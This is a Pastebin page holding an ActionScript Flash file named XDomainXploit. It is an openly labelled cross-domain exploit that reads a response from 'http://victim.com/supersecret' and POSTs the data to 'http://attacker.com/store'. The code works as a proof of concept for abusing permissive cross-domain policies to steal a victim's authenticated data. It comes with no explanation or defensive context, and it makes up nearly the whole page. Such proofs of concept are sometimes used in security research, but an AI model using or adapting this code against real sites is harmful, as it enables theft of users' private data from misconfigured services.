SHARE
TWEET

Script

a guest Jan 28th, 2015 857 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  // Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)
  2. // XDomainXploit.as
  3. package {
  4. import flash.display.Sprite;
  5. import flash.events.*;
  6. import flash.net.URLRequestMethod;
  7. import flash.net.URLRequest;
  8. import flash.net.URLLoader;
  9.  
  10.  
  11. public class XDomainXploit extends Sprite {
  12. public function XDomainXploit() {
  13. // Target URL from where the data is to be retrieved
  14. var readFrom:String = "http://victim.com/supersecret";
  15. var readRequest:URLRequest = new URLRequest(readFrom);
  16. var getLoader:URLLoader = new URLLoader();
  17. getLoader.addEventListener(Event.COMPLETE, eventHandler);
  18. try {
  19. getLoader.load(readRequest);
  20. } catch (error:Error) {
  21. trace("Error loading URL: " + error);
  22. }
  23. }
  24.  
  25.  
  26. private function eventHandler(event:Event):void {
  27. // URL to which retrieved data is to be sent
  28. var sendTo:String = "http://attacker.com/store"
  29. var sendRequest:URLRequest = new URLRequest(sendTo);
  30. sendRequest.method = URLRequestMethod.POST;
  31. sendRequest.data = event.target.data;
  32. var sendLoader:URLLoader = new URLLoader();
  33. try {
  34. sendLoader.load(sendRequest);
  35. } catch (error:Error) {
  36. trace("Error loading URL: " + error);
  37. }
  38. }
  39. }
  40. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top